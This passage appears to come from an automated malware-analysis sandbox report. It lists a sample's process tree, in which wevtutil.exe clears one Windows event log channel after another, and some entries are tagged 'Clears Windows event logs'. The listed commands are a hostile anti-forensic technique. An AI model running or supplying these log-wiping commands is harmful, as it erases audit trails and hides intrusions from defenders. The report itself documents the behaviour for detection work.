C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Known Folders API Service"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MCT/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MUI/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NCSI/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NDIS/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NTLM/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetShell/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"4⤵
- Power Settings
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PrintService/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Recovery/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sens/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Setup/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-StorPort/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/Main"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-TunnelDriver"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UAC/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"4⤵
- Clears Windows event logs
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"4⤵
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WUSA/Debug"4⤵
- Clears Windows event logs
-
-
